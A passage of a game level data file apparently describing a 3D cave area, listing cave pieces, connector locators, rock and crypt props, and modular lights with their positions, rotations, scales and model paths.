0.0),'Parent Uid': '1235611530.73akelts','Pos': Point3(150.0, -150.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237584256.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(52.016, -3.134, -17.245),'Pos': Point3(76.351, -67.013, -3.998),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1237584256.0akelts1': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-90.316, 0.0, 0.0),'Pos': Point3(-7.118, -47.752, -5.201),'Scale': VBase3(6.769, 6.769, 8.069),'VisSize': 'Large','VisZone': '2_1235611530.73akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_j'}},'1237587968.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(90.0, 0.0, 0.0),'Pos': Point3(-55.429, -222.436, -43.219),'Scale': VBase3(2.334, 2.334, 3.075),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1238122450.62kmuller': {'Type': 'Light - Modular','ConeAngle': '73.8253','ConstantAttenuation': '0.0000','DropOff': '0.0000','Hpr': VBase3(90.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0163','Pos': Point3(-54.874, -225.144, 53.805),'QuadraticAttenuation': '0.0783','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.0, 1.0, 0.0, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238122549.4kmuller': {'Type': 'Light - Modular','ConeAngle': '15.0000','ConstantAttenuation': '0.0000','DropOff': '0.0000','Hpr': VBase3(90.0, 0.0, 0.0),'LightSphere': False,'LightType': 'POINT','LinearAttenuation': '0.0000','Pos': Point3(33.791, -131.068, 28.758),'QuadraticAttenuation': '0.2048','Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.0, 1.0, 0.0, 1.0),'Model': 'models/props/light_tool_bulb_modular'}},'1238125045.1kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(72.809, 0.0, -13.181),'Pos': Point3(42.658, -210.918, 
-39.702),'Scale': VBase3(0.545, 0.545, 0.545),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_big'}},'1238125152.02kmuller': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(130.354, 0.0, 0.0),'Pos': Point3(-65.841, -141.727, -56.865),'Scale': VBase3(3.149, 3.149, 3.149),'VisSize': '','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_tall'}}},'Pos': Point3(-175.0, 325.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611530.73akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveWide_vista'}},'1235611531.39akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611531.41akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611531.39akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611692.63akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611531.39akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-175.0, 325.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611530.73akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611532.06akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611532.08akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611532.06akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611704.75akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611532.06akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611704.77akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611532.06akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237828348.45akelts': {'Type': 
'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.0, 0.0, 0.0),'Pos': Point3(-26.433, -7.306, -5.912),'Scale': VBase3(1.175, 1.175, 1.547),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1237828366.56akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-174.228, 0.0, 0.0),'Pos': Point3(29.798, -11.099, -6.634),'Scale': VBase3(1.53, 1.53, 2.016),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}}},'Pos': Point3(-75.0, 325.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611531.39akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611532.73akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(0.0, 0.0, 0.0),'Objects': {'1235611532.73akelts0': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611532.73akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-25.0, 275.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611532.06akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611533.41akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(720.0, 0.0, 0.0),'Objects': {'1235611533.42akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611533.41akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611724.3akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611533.41akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-25.0, 475.0, 242.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611533.41akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611534.09akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(180.0, 0.0, 0.0),'Objects': {'1235611534.11akelts': {'Type': 'Locator Node','Name': 
'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611534.09akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611556.56akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611534.09akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237827104.49akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(37.614, 0.0, 0.0),'Pos': Point3(-17.746, -76.489, -1.117),'Scale': VBase3(0.813, 0.813, 0.813),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}}},'Pos': Point3(350.0, 450.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/caves/pir_m_are_cav_hallNarrow100'}},'1235611746.08akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611746.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611746.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611746.11akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611746.08akelts','Pos': Point3(0.0, -150.0, 42.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237828412.73akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-72.82, 0.0, -14.517),'Pos': Point3(28.186, -106.422, 27.898),'Scale': VBase3(1.062, 1.062, 1.062),'VisSize': 'Large','VisZone': '0_1235611035.98akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}}},'Pos': Point3(-25.0, 625.001, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611746.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallWideAscend'}},'1235611775.94akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611775.95akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 
0.0),'Parent Uid': '1235611775.94akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611815.78akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611775.94akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237594112.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-39.722, -5.564, -180.0),'Pos': Point3(-126.354, -153.401, 44.422),'Scale': VBase3(1.368, 1.368, 1.368),'VisSize': 'Large','VisZone': '2_1235611775.94akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}}},'Pos': Point3(-350.0, -450.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611775.94akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611777.48akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611777.5akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611777.48akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611842.06akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611777.48akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611842.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611777.48akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237594112.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-103.459, 0.0, 0.0),'Pos': Point3(-17.249, -68.361, -3.554),'Scale': VBase3(0.687, 0.687, 0.687),'VisSize': 'Large','VisZone': '2_1235611777.48akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}}},'Pos': Point3(-300.0, -500.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611777.48akelts','Visual': {'Model': 
'models/caves/pir_m_are_cav_threeway100'}},'1235611781.22akelts': {'Type': 'Cave_Pieces','Hpr': Point3(0.0, 0.0, 0.0),'Objects': {'1235611781.23akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611781.22akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-250.0, -550.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611777.48akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611782.08akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611782.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611782.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611872.81akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611782.08akelts','Pos': Point3(-175.0, -175.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-175.0, -725.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611782.08akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveNarrow'}},'1235611783.0akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611783.02akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611783.0akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611883.44akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611783.0akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611883.47akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611783.0akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237583872.0akelts': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': 
VBase3(-140.552, 0.0, 0.0),'Pos': Point3(21.304, -69.001, -0.143),'Scale': VBase3(1.451, 1.451, 1.451),'VisSize': 'Large','VisZone': '2_1235611783.0akelts','Visual': {'Model': 'models/props/crypt1'}},'1237584000.0akelts': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(-91.588, 0.0, 0.0),'Pos': Point3(-45.632, -49.635, -0.126),'Scale': VBase3(1.525, 1.525, 1.525),'VisSize': 'Large','VisZone': '1_1235611783.0akelts','Visual': {'Model': 'models/props/pir_m_prp_cem_gate_english'}},'1237593856.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-26.344, 0.0, 0.0),'Pos': Point3(-47.515, -63.552, -2.58),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611783.0akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}}},'Pos': Point3(-125.0, -775.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611783.0akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611783.89akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(450.0, 0.0, 0.0),'Objects': {'1235611783.91akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611783.89akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611892.27akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611783.89akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237583872.0akelts0': {'Type': 'Cemetary','DisableCollision': False,'Holiday': '','Hpr': VBase3(175.605, 0.0, 0.0),'Pos': Point3(-0.656, -83.64, -0.267),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '1_1235611783.89akelts','Visual': {'Model': 'models/props/crypt2'}}},'Pos': Point3(-175.0, -825.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611783.89akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611784.77akelts': {'Type': 
'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611784.78akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611784.77akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611856.48akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611784.77akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-200.0, -400.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611784.77akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_elbow100'}},'1235611785.67akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611785.69akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611785.67akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(-175.0, -825.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611783.89akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_deadend100'}},'1235611786.56akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(630.0, 0.0, 0.0),'Objects': {'1235611786.58akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611786.56akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611907.05akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611786.56akelts','Pos': Point3(0.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237593728.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-179.06, 0.0, 0.0),'Pos': Point3(20.607, -103.261, 0.069),'Scale': VBase3(0.653, 0.898, 0.966),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}}},'Pos': Point3(25.0, -725.0, 200.0),'Scale': VBase3(1.0, 1.0, 
1.0),'VisSize': 'Large','VisZone': '0_1235611786.56akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallTransition'}},'1235611787.47akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(-90.0, 0.0, 0.0),'Objects': {'1235611787.48akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611787.47akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611825.73akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611787.47akelts','Pos': Point3(50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611825.75akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611787.47akelts','Pos': Point3(-50.0, -50.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237593984.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-0.121, 0.0, 0.0),'Pos': Point3(28.728, -26.785, -2.419),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1237593984.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-143.274, 0.0, 0.0),'Pos': Point3(10.326, -78.165, -10.588),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1237593984.0akelts1': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-39.722, 0.0, 0.0),'Pos': Point3(-27.865, -21.438, -1.009),'Scale': VBase3(1.368, 1.368, 1.368),'VisSize': 'Large','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}}},'Pos': Point3(-300.0, -500.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611777.48akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway100'}},'1235611788.39akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(720.0, 0.0, 0.0),'Objects': {'1235611788.41akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 
0.0, 0.0),'Parent Uid': '1235611788.39akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611917.53akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611788.39akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611917.55akelts': {'Type': 'Locator Node','Name': 'cave_connector_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Parent Uid': '1235611788.39akelts','Pos': Point3(-100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1237593600.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-34.219, 0.0, 0.0),'Pos': Point3(90.881, -133.889, 0.66),'Scale': VBase3(1.536, 1.536, 2.272),'VisSize': 'Large','VisZone': '3_1235611788.39akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_e'}}},'Pos': Point3(125.0, -625.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611788.39akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_threeway200_lava'}},'1235611789.31akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(90.0, 0.0, 0.0),'Objects': {'1235611789.33akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611789.31akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611926.59akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611789.31akelts','Pos': Point3(150.0, -150.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(225.0, -725.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '2_1235611789.31akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_curveWide_ravine_lava'}},'1235611790.25akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(720.0, 0.0, 0.0),'Objects': {'1235611790.27akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611790.25akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 
1.0)},'1235611941.53akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611790.25akelts','Pos': Point3(0.0, -200.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)}},'Pos': Point3(375.0, -375.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611791.19akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallWide200'}},'1235611791.19akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611791.2akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611791.19akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611955.27akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611791.19akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1236212352.0akelts4': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(169.589, 0.0, 0.0),'Pos': Point3(48.012, -45.202, -16.604),'Scale': VBase3(0.58, 0.58, 0.58),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_big'}},'1237583616.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(0.505, 0.0, 0.0),'Pos': Point3(28.898, -66.347, 12.965),'Scale': VBase3(0.825, 0.825, 1.22),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_d'}},'1237583616.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-124.883, 0.0, 3.919),'Pos': Point3(58.36, -28.88, -17.767),'Scale': VBase3(2.911, 2.911, 3.412),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_a'}}},'Pos': Point3(375.0, -375.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611791.19akelts','Visual': {'Model': 
'models/caves/pir_m_are_cav_elbow200'}},'1235611792.13akelts': {'Type': 'Cave_Pieces','Hpr': VBase3(270.0, 0.0, 0.0),'Objects': {'1235611792.14akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611792.13akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611967.94akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(-90.0, 0.0, 0.0),'Parent Uid': '1235611792.13akelts','Pos': Point3(0.0, -200.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1236212352.0akelts2': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-20.989, 0.0, 0.0),'Pos': Point3(-24.748, -160.786, 1.068),'Scale': VBase3(1.017, 1.017, 1.017),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_d'}},'1236212352.0akelts3': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-52.528, 0.0, 0.0),'Pos': Point3(16.345, -67.753, 0.403),'Scale': VBase3(1.563, 1.563, 1.563),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_c'}},'1237582592.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(158.293, 0.0, 0.0),'Pos': Point3(16.471, -54.976, 0.357),'Scale': VBase3(1.311, 1.311, 1.311),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_b'}},'1237582592.0akelts0': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(68.293, -15.86, -180.0),'Pos': Point3(-17.386, -100.494, 57.428),'Scale': VBase3(1.277, 0.64, 0.64),'VisSize': 'Large','VisZone': '0_1235611119.33akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rock_e'}}},'Pos': Point3(275.0, -275.0, 200.0),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': 'Large','VisZone': '0_1235611792.13akelts','Visual': {'Model': 'models/caves/pir_m_are_cav_hallWide200'}},'1235611793.08akelts': {'Type': 
'Cave_Pieces','Hpr': VBase3(540.0, 0.0, 0.0),'Objects': {'1235611793.09akelts': {'Type': 'Locator Node','Name': 'cave_connector_0','Hpr': VBase3(90.0, 0.0, 0.0),'Parent Uid': '1235611793.08akelts','Pos': Point3(0.0, 0.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1235611988.31akelts': {'Type': 'Locator Node','Name': 'cave_connector_1','Hpr': VBase3(0.0, 0.0, 0.0),'Parent Uid': '1235611793.08akelts','Pos': Point3(100.0, -100.0, 0.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1236212480.0akelts1': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(4.103, 0.0, 0.0),'Pos': Point3(43.667, -49.461, -3.709),'Scale': VBase3(6.811, 6.811, 18.866),'VisSize': 'Large','VisZone': '0_1235611793.08akelts','Visual': {'Model': 'models/props/pir_m_prp_cav_rockGroup_k'}},'1237583744.0akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-98.576, 0.0, 4.28),'Pos': 